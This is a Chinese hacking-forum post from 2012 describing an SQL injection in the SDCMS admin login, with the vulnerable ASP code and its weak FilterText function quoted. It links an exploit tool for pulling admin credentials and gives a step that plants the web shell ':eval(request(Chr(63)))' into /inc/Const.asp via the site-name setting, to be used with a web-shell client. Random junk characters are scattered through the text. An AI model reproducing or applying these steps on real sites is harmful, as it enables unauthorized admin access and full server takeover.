作者:T00LS 鬼哥
9 O/ H0 x: T/ u5 U p5 _漏洞文件:后台目录/index.asp$ A8 f& F% L/ d, s0 I# [( j
$ g( v, R3 L: m! O& ]: p3 v, H
Sub Check
+ S" Q; L+ h- C. j) A0 w( E; z Dim username,password,code,getcode,Rs/ \* _$ a7 J; z% I8 o9 C
IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub. e' w3 x. l8 g, n
username=FilterText(Trim(Request.Form("username")),1)( ?0 d6 x6 m: z
password=FilterText(Trim(Request.Form("password")),1)
; R" C1 H5 }7 y/ j& h. ` code=Trim(Request.Form("yzm")); F5 x" ?7 z+ j- f' U
getcode=Session("SDCMSCode")
9 p* J9 C+ P1 }% w. N- P/ W IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died) H4 h6 l/ D U' B+ n2 p
IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied
5 w8 H8 A) F# J1 r( O. P! B. D IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
}' `% F" Q( N$ d/ v+ k0 T! z# r IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied+ T- d/ r( I7 R5 X# L8 M
IF username="" or password="" Then( p G! J0 f/ G- v2 m1 e( c
Echo "用户名或密码不能为空"ied
7 }$ Z2 z) Z! | Else
0 i: S9 G( n Z4 B Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")4 k: i9 N4 o5 c2 X" W9 t$ k i
IF Rs.Eof Then8 u! D2 o( D( v" u; c, [
AddLog username,GetIp,"登录失败",13 A/ T* ~6 }. Q5 P, L
Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会", [9 j _- N4 F9 L9 ^' b& Y9 j: E8 e
Else$ z# b A u' R b
Add_Cookies "sdcms_id",Rs(0)
/ o- o( w* Q1 p) J; y& r1 h Add_Cookies "sdcms_name",username, F7 j5 d* R9 P# k
Add_Cookies "sdcms_pwd",Rs(2)
$ R6 P9 @: X y7 }/ R' M Add_Cookies "sdcms_admin",Rs(3)
6 x$ `8 u, C, f( I& h% Z6 a Add_Cookies "sdcms_alllever",Rs(4)
: T- M f, n1 _% f5 } Add_Cookies "sdcms_infolever",Rs(5)
' h ]4 x' R0 Y8 u# D Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")% o# |: z1 c$ {- @# m. B
AddLog username,GetIp,"登录成功",1
k9 q& P5 g0 h! Y9 K2 X/ A '自动删除30天前的Log记录
j2 S* H, V6 @9 R# _& t$ q IF Sdcms_DataType Then
, g2 x: w7 c! L, ?: c Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")
& [/ s. `, ~2 G- a7 ^$ d. U& b4 C, } Else" C! P9 K2 y% W0 K0 }: _. \4 H
Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")5 Y) s; K/ i: q* T
End IF
' j% d% y: S) S! z1 b' S Go("sdcms_index.asp")) T L! P: {: F4 D
End IF& @' P5 v- |0 I* U
Rs.Close6 M8 i4 x: r( d0 F' c6 n
Set Rs=Nothing
3 e$ z) C6 i7 k* h+ h- P. n End IF1 p4 R. X7 V# Z' _$ r( F
End Sub
0 f' f9 ?. x: W* n
' x( e" B* e7 }9 _’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码) @" L1 D1 r: w2 ?0 y! K
' M1 k* @7 h5 J) ]8 m* t5 sFunction FilterText(ByVal t0,ByVal t1)
/ z4 T% t/ N; \8 P. d7 h3 M2 E IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function
4 B2 }2 |7 C3 s( R t0=Trim(t0)0 r: j& `" c) W6 m9 f' ~
Select Case t1' f& j& I$ m2 g1 t0 E0 Q
Case "1"4 j2 ?$ E9 p1 Q
t0=Replace(t0,Chr(32),"")
: v+ D, j. N! K' g1 d+ m: u: k4 v t0=Replace(t0,Chr(13),"")
/ O- E7 l4 s1 J6 t1 g/ M: z t0=Replace(t0,Chr(10)&Chr(10),"")
: j, U4 K5 [ x) z7 \) t t0=Replace(t0,Chr(10),"")
, A% G- ` d0 F$ I, s9 _ Case "2"0 R$ @. M8 C" Q9 Q0 i3 J
t0=Replace(t0,Chr(8),"")'回格
) |5 C5 o- h: M4 R- f& ]$ w t0=Replace(t0,Chr(9),"")'tab(水平制表符)
~9 l! E; P( J7 g7 W6 X. i t0=Replace(t0,Chr(10),"")'换行" S) H2 U8 z& w+ @4 c! Z
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)
0 V6 [# r4 K/ ]. V t0=Replace(t0,Chr(12),"")'换页2 t$ N* s% i6 e
t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合
: r6 k* g8 {. |' H) \% O t0=Replace(t0,Chr(22),"")4 E0 X9 I5 e% \2 \/ P
t0=Replace(t0,Chr(32),"")'空格 SPACE: ^: Y) g5 S7 o! X
t0=Replace(t0,Chr(33),"")'!+ [: M( ]) R3 s: P, K! R
t0=Replace(t0,Chr(34),"")'") O( ?2 Z* q2 _
t0=Replace(t0,Chr(35),"")'#9 @& r/ [; o; L' A2 o5 S/ Y
t0=Replace(t0,Chr(36),"")'$
2 P, T, c+ z7 F1 L t0=Replace(t0,Chr(37),"")'%: u7 Q0 h" L" Y P( U, r6 `
t0=Replace(t0,Chr(38),"")'&
# i) Y9 k9 E/ x4 R t0=Replace(t0,Chr(39),"")''4 g# [4 r7 T$ g3 s% y$ Q
t0=Replace(t0,Chr(40),"")'(6 U! {/ }: h( g8 @1 i
t0=Replace(t0,Chr(41),"")')' \4 i2 O0 B0 C v0 x
t0=Replace(t0,Chr(42),"")'*6 N" i3 P# L. `! d: }& T7 W
t0=Replace(t0,Chr(43),"")'+
4 z/ r3 c3 w8 x k t0=Replace(t0,Chr(44),"")',
0 A. K4 z: U: J4 `& ] t0=Replace(t0,Chr(45),"")'-( P, t! W1 o) {3 V* u+ G
t0=Replace(t0,Chr(46),"")'.- g3 f- V; O* w4 I& N
t0=Replace(t0,Chr(47),"")'/
. a A/ G9 a; m6 D5 h$ V7 k" N1 M t0=Replace(t0,Chr(58),"")':
7 g/ G* T) ?3 i+ V) {( T t0=Replace(t0,Chr(59),"")';+ G$ Y! K2 M7 p- q# c
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
6 |: J% W3 [ F+ l4 ]% H2 U t0=Replace(t0,Chr(63),"")'?
$ c5 S) x( E' H; w t0=Replace(t0,Chr(64),"")'@
L) f! M u7 N5 E2 o8 q t0=Replace(t0,Chr(91),"")'\ `" m! J1 [% Z* s
t0=Replace(t0,Chr(92),"")'\
2 F1 w7 v) \2 T t0=Replace(t0,Chr(93),"")']& `2 E) p# T' W) x+ K% X% e
t0=Replace(t0,Chr(94),"")'^4 k. J& V! b" k! A4 g, ]0 s
t0=Replace(t0,Chr(95),"")'_5 L4 ~4 b3 x g1 w- N$ r/ l. B: Z+ R$ f
t0=Replace(t0,Chr(96),"")'`/ O6 p5 h; m( k* {3 a
t0=Replace(t0,Chr(123),"")'{. ?/ B! @/ G% i; t
t0=Replace(t0,Chr(124),"")'|
' k7 A2 p% m& K+ J t0=Replace(t0,Chr(125),"")'}# @2 O6 Q: w& q( {+ s
t0=Replace(t0,Chr(126),"")'~7 o5 ?& X" S: [: v& n9 _: `
Case Else
6 S' ]' D; ?+ s& x) G1 M; g; d9 s t0=Replace(t0, "&", "&")
' x& c+ ?+ \/ T! o" u8 p7 t t0=Replace(t0, "'", "'")5 G1 q: e# j( S. x6 Y. M1 k: g
t0=Replace(t0, """", """)8 y' k0 d* w" ]) v6 X; e! T
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")$ w2 ?* ?$ N" k
End Select
' g4 n, A! U7 ^! [ IF Instr(Lcase(t0),"expression")>0 Then' n( n0 Q, m7 [+ G6 g2 C e1 G
t0=Replace(t0,"expression","e­xpression", 1, -1, 0)
; M; g; g% s* F! I End If# j- O; R0 ]' s' ?# Z, j
FilterText=t0
9 {6 ?/ ]% Z# v& r. cEnd Function
5 e5 `0 P" V- ^/ k- ]
$ P' P6 i! n5 M. x" ^0 x看到没。直接参数是1 只过滤
- ^( H u% `3 }; E6 q t0=Replace(t0,Chr(32)," ")
1 r0 j# X9 O" [- I3 I t0=Replace(t0,Chr(13),"")
" V. K. t- _' D* b6 w t0=Replace(t0,Chr(10)&Chr(10),"% U, b- r0 g: F2 E3 b ~
")
* z! Z; x" c' S7 X8 V3 [( p t0=Replace(t0,Chr(10),"- [* k$ d, h/ f. F$ _
")
( N! h" l: Z6 X5 @" A1 l s漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
9 f6 I0 E/ N( c# gEXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP. m% H- K5 ?6 K; C% N
$ \' N- B2 m0 s4 j; h测试:
- i6 I+ e9 {6 O9 C: c
. `$ |- y1 @( U* ^. a% A0 j p8 D* I k: ~5 {# v
现在输入工具上验证码,然后点OK7 X" D% v5 i! ^6 V% f- l
2 h8 O, B0 Q3 F8 s6 x
% D3 ^0 M5 K# Q/ }; s看到我们直接进入后台管理界面了,呵呵!$ g f: K4 y6 I6 T' [( x
+ c- h5 E1 R3 Z/ p8 ?
4 Z3 |+ N( N9 N( x! E$ j
8 V/ J1 A' D; V6 J这样直接进入后台了。。。。7 h/ V, c. g( H( H; ^
& _- X1 ?4 I c( k
/ c* m+ c. H v ~3 _% }7 z
! h- a* O) p, J1 P# u/ g, kSDCMS提权:
( H/ h9 e3 k8 S4 R' Z
; G4 b) _/ I. P _3 x方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?
9 M0 h3 v1 u; ^6 c" _0 F ^8 g% o, m% c1 e3 p7 [
9 Z/ Q. T# ~' z) E
- S- n# L0 B* F6 V7 e9 b- EOK,现在用菜刀连接下!
7 T$ m3 F) x4 \5 T( o# _: |- ^: b- {0 o2 j& N. E+ a
# m& n# Z7 B( `8 I( Q$ @- c7 B1 U0 G! ]+ i9 |
" T' C* v& a! g- @+ ?2 |; ?
. b5 E' g; ~& T$ t4 k& \/ d |
发表于 2012-11-9 20:57:02
收藏
支持
反对